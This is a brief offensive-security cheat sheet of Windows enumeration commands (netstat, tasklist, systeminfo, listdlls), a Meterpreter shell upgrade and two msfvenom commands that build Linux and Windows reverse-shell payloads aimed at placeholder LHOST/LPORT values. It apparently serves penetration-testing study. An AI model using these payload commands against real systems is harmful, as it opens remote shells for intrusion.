Cyberspace Operations

Windows Enumeration Commands

cls clears the command prompt screen

dir <text.txt> /s /p show the directory of the file text.txt

driverquery shows all of the drivers on the computer

ipconfig shows the current IP configuration for the computer

ipconfig /all shows and expanded or verbose version of ipconfig.

listdlls -u shows information about all installed dlls. This requires Administrator or elevated privileges but it does not hurt to check if mis-configurations allows for un-elevated users to utilize this command.

net start without out options, displays all of the network services available

net start <service> starts the network service

net stop <service> stops the network service

netstat -an |find /i “established” shows all of the IP addresses and ports the computer is connected to.

netstat -an |find /i “listening” shows all of the IP addresses and ports the computer is listening for.

netstat -ano check all of the IPs that the computer is interacting with and displays the process ID (PID) for that interaction.

strings <file name> dumps all string (text) information associated with the file.

tasklist shows all of the currently running processes

type <file.txt> displays the file in windows command line

powershell.exe -noexit starts PowerShell in command line.

systeminfo displays hardware, OS, and kernel information for the computer.

Windows WMIC Enumeratoin


execute -f cmd.exe -i H upgrades the Meterpreter shell to Windows shell.

MSFVenom Payload Cheat Sheet

msfvenom –platform Linux -p linux/x64/meterpreter_reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f elf -o shellme creates a Linux x64 reverse shell and outputs a file name shellme with the shell code.

msfvenom -p windows/shell_reverse_tcp LHOST=X.X.X.X LPORT=XXXX EXITFUNC=thread -f python -a x86 -b \x00\ creates a windows reverse shell with an exit function for x86 architecture and ensures that bad characters are not utilized.